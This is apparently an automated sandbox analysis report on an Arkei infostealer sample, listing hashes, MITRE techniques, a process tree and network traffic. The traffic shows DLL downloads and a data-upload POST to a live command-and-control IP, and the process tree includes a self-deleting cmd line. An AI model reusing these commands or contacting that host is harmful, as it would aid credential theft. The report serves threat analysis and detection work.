Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
24/08/2024, 11:25 UTC
Behavioral task
behavioral1
Sample
311476e365e80b02b44b55ddcf5865c4.exe
Resource
win7-20240704-en
General
-
Target
311476e365e80b02b44b55ddcf5865c4.exe
-
Size
68KB
-
MD5
311476e365e80b02b44b55ddcf5865c4
-
SHA1
d6fd497eb25234c77b2e8f672e292b5f9f760550
-
SHA256
a1e0a1c53824bb1d9d0adcaa6a8e8e2f5bef673b0981807a5775a182f28fe235
-
SHA512
70ff8f50b54df097a456689eed6c6218b2bb9d8c9e9f46c7b6e5a9dc5060eb331ba36f13cde252758b049f5b4ac498abf2d2b5c256edaf5dd7c777274e31b231
-
SSDEEP
1536:x2vMlMpCPJeGnyJDBld71oCe10yf0cCGMyo+JM4Z8L6Q3hs1:x2vMlMp8JeoyJDBlZycdGMyoYM+/D
Malware Config
Extracted
arkei
Default
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Downloads MZ/PE file
-
Deletes itself 1 IoCs
pid Process 2828 cmd.exe -
Loads dropped DLL 3 IoCs
pid Process 836 311476e365e80b02b44b55ddcf5865c4.exe 836 311476e365e80b02b44b55ddcf5865c4.exe 836 311476e365e80b02b44b55ddcf5865c4.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/836-0-0x0000000000400000-0x0000000000432000-memory.dmp upx behavioral1/memory/836-1-0x0000000000400000-0x0000000000432000-memory.dmp upx behavioral1/memory/836-53-0x0000000000400000-0x0000000000432000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 311476e365e80b02b44b55ddcf5865c4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 311476e365e80b02b44b55ddcf5865c4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 311476e365e80b02b44b55ddcf5865c4.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2672 timeout.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 836 wrote to memory of 2828 836 311476e365e80b02b44b55ddcf5865c4.exe 32 PID 836 wrote to memory of 2828 836 311476e365e80b02b44b55ddcf5865c4.exe 32 PID 836 wrote to memory of 2828 836 311476e365e80b02b44b55ddcf5865c4.exe 32 PID 836 wrote to memory of 2828 836 311476e365e80b02b44b55ddcf5865c4.exe 32 PID 2828 wrote to memory of 2672 2828 cmd.exe 34 PID 2828 wrote to memory of 2672 2828 cmd.exe 34 PID 2828 wrote to memory of 2672 2828 cmd.exe 34 PID 2828 wrote to memory of 2672 2828 cmd.exe 34
Processes
-
C:\Users\Admin\AppData\Local\Temp\311476e365e80b02b44b55ddcf5865c4.exe"C:\Users\Admin\AppData\Local\Temp\311476e365e80b02b44b55ddcf5865c4.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\311476e365e80b02b44b55ddcf5865c4.exe" & exit2⤵
- Deletes itself
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\SysWOW64\timeout.exetimeout /t 53⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2672
-
-
Network
-
Remote address:104.194.151.11:80RequestGET /AP.php HTTP/1.1
Host: 104.194.151.11
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Set-Cookie: PHPSESSID=m3804cc7ff5fm6akl5jau4ljv9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 12
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:104.194.151.11:80RequestGET /sqlite3.dll HTTP/1.1
Host: 104.194.151.11
Cache-Control: no-cache
Cookie: PHPSESSID=m3804cc7ff5fm6akl5jau4ljv9
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Last-Modified: Mon, 19 Aug 2024 19:27:59 GMT
ETag: "9d9d8-6200e4e88720f"
Accept-Ranges: bytes
Content-Length: 645592
Content-Type: application/x-msdos-program
-
Remote address:104.194.151.11:80RequestGET /freebl3.dll HTTP/1.1
Host: 104.194.151.11
Cache-Control: no-cache
Cookie: PHPSESSID=m3804cc7ff5fm6akl5jau4ljv9
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Last-Modified: Mon, 19 Aug 2024 19:27:59 GMT
ETag: "519d0-6200e4e818494"
Accept-Ranges: bytes
Content-Length: 334288
Content-Type: application/x-msdos-program
-
Remote address:104.194.151.11:80RequestGET /mozglue.dll HTTP/1.1
Host: 104.194.151.11
Cache-Control: no-cache
Cookie: PHPSESSID=m3804cc7ff5fm6akl5jau4ljv9
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Last-Modified: Mon, 19 Aug 2024 19:27:59 GMT
ETag: "217d0-6200e4e840d08"
Accept-Ranges: bytes
Content-Length: 137168
Content-Type: application/x-msdos-program
-
Remote address:104.194.151.11:80RequestGET /msvcp140.dll HTTP/1.1
Host: 104.194.151.11
Cache-Control: no-cache
Cookie: PHPSESSID=m3804cc7ff5fm6akl5jau4ljv9
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Last-Modified: Mon, 19 Aug 2024 19:27:59 GMT
ETag: "6b738-6200e4e857852"
Accept-Ranges: bytes
Content-Length: 440120
Content-Type: application/x-msdos-program
-
Remote address:104.194.151.11:80RequestGET /nss3.dll HTTP/1.1
Host: 104.194.151.11
Cache-Control: no-cache
Cookie: PHPSESSID=m3804cc7ff5fm6akl5jau4ljv9
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Last-Modified: Mon, 19 Aug 2024 19:27:59 GMT
ETag: "1303d0-6200e4e85fd23"
Accept-Ranges: bytes
Content-Length: 1246160
Content-Type: application/x-msdos-program
-
Remote address:104.194.151.11:80RequestGET /softokn3.dll HTTP/1.1
Host: 104.194.151.11
Cache-Control: no-cache
Cookie: PHPSESSID=m3804cc7ff5fm6akl5jau4ljv9
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Last-Modified: Mon, 19 Aug 2024 19:27:59 GMT
ETag: "235d0-6200e4e86cc2d"
Accept-Ranges: bytes
Content-Length: 144848
Content-Type: application/x-msdos-program
-
Remote address:104.194.151.11:80RequestGET /vcruntime140.dll HTTP/1.1
Host: 104.194.151.11
Cache-Control: no-cache
Cookie: PHPSESSID=m3804cc7ff5fm6akl5jau4ljv9
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Last-Modified: Mon, 19 Aug 2024 19:27:59 GMT
ETag: "14748-6200e4e8856b7"
Accept-Ranges: bytes
Content-Length: 83784
Content-Type: application/x-msdos-program
-
Remote address:104.194.151.11:80RequestPOST /AP.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----I5P8GD2V3W47YUS2
Host: 104.194.151.11
Content-Length: 46508
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: PHPSESSID=m3804cc7ff5fm6akl5jau4ljv9
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 0
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
113.5kB 3.1MB 1392 2259
HTTP Request
GET http://104.194.151.11/AP.phpHTTP Response
200HTTP Request
GET http://104.194.151.11/sqlite3.dllHTTP Response
200HTTP Request
GET http://104.194.151.11/freebl3.dllHTTP Response
200HTTP Request
GET http://104.194.151.11/mozglue.dllHTTP Response
200HTTP Request
GET http://104.194.151.11/msvcp140.dllHTTP Response
200HTTP Request
GET http://104.194.151.11/nss3.dllHTTP Response
200HTTP Request
GET http://104.194.151.11/softokn3.dllHTTP Response
200HTTP Request
GET http://104.194.151.11/vcruntime140.dllHTTP Response
200HTTP Request
POST http://104.194.151.11/AP.phpHTTP Response
200
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
133KB
MD58f73c08a9660691143661bf7332c3c27
SHA137fa65dd737c50fda710fdbde89e51374d0c204a
SHA2563fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA5120042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89
-
Filesize
1.2MB
MD5bfac4e3c5908856ba17d41edcd455a51
SHA18eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA5122565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66
-
Filesize
630KB
MD5e477a96c8f2b18d6b5c27bde49c990bf
SHA1e980c9bf41330d1e5bd04556db4646a0210f7409
SHA25616574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c